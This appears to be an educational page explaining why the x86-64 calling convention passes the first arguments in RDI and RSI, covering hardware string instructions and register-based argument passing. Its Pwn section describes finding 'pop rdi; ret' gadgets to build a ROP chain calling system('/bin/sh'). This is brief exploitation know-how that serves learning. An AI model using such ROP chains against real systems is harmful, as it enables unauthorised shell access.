The “Unwritten Rule” of RDI as the First Argument
Table of Contents
- The “Unwritten Rule” of RDI as the First Argument
- 1. Hardware Legacy: Enabling “Zero-Cost” Calls to System Instructions
- 2. Performance Revolution: Evolving from the “Memory Era” to the “Register Era”
- 3. Practical Significance: Impact on Pwn and Reverse Engineering
The “Unwritten Rule” of RDI as the First Argument
This question gets to the core of low-level design. Why is it specifically defined that RDI is the first argument and RSI is the second? Why not randomly pick two registers instead, such as R8 and R9?
The reasons behind this can mainly be summarized in two points: the continuation of hardware legacy and extreme performance optimization.
1. Hardware Legacy: Enabling “Zero-Cost” Calls to System Instructions
In C, the operational logic of many fundamental functions is “destination source”. The most typical example is memcpy(dest, src, size).
-
RDI: the D stands for Destination.
-
RSI: the S stands for Source.
The brilliance of the design:
The x86 architecture has some very powerful built-in “string instructions” (such as movsb). These instructions are hard-wired into the CPU circuitry, and they mandate the use of RSI as the source and RDI as the destination.
If the calling convention (ABI) specifies that the first argument goes into RDI and the second into RSI, then when you write memcpy(dest, src, n):
-
destis already in RDI. -
srcis already in RSI. -
The CPU does not need to spend extra time issuing
movinstructions to swap register values; it can start copying immediately with a single hardware instruction.
Conclusion: this design allows high-frequency C functions (such as string processing and memory copying) to connect directly to the CPU’s hardware-accelerated instructions.
2. Performance Revolution: Evolving from the “Memory Era” to the “Register Era”
In the old 32-bit (x86) era, function arguments were placed on the stack.
- Drawback: the stack resides in memory, and CPU access to memory is far slower than access to registers. Every function call required writing to memory and reading from memory, which was highly wasteful.
By the 64-bit (x86-64) era, more registers became available. Engineers established a set of rules (the System V ABI) that requires the first 6 arguments to be passed through registers.
Why this particular order?
It works like a “standard protocol.” Without such a rule:
-
Programmer A might write a function assuming the first argument is in RAX.
-
Programmer B might write code that passes the argument in RBX.
-
Result: the program crashes immediately.
The purpose of uniformly specifying RDI, RSI, … is to ensure that compilers, operating systems, and code written in different languages can communicate with each other seamlessly. It is like everyone agreeing to drive on the right side of the road.
3. Practical Significance: Impact on Pwn and Reverse Engineering
For students learning binary security (Pwn), understanding this is crucial:
-
Finding gadgets: when constructing a ROP chain, you often need to control the first argument (for example,
system("/bin/sh")). Since you know the rule is RDI, you will specifically look for instruction snippets likepop rdi; ret. -
Quickly locating vulnerabilities: when you see code in a disassembler (such as IDA) passing a strange address into RDI and then calling a function, you can immediately realize: “Oh, it is setting up the first argument of that function.”
Summary Comparison Table
| Dimension | Old Era (32-bit/x86) | New Era (64-bit/x86-64) | Benefits |
|---|---|---|---|
| Storage location | Memory stack (Stack) | Registers (RDI, RSI…) | Fast (register access is on the nanosecond scale) |
| Instruction count | Requires multiple push/pop operations | Simple mov is enough | Smaller code size and higher execution efficiency |
| Logical consistency | Arbitrary | Strictly follows Dest/Source logic | Hardware-level optimization, reducing the cost of data movement |
Would you like to see how the CPU is “forced” to use the memory stack to handle arguments when there are more than 6 of them (and registers are no longer sufficient)?
—> When There Are More Than 6 Parameters, the Memory Stack Is "Forced" Into Use —> 参数从右往左压栈道”设计心机”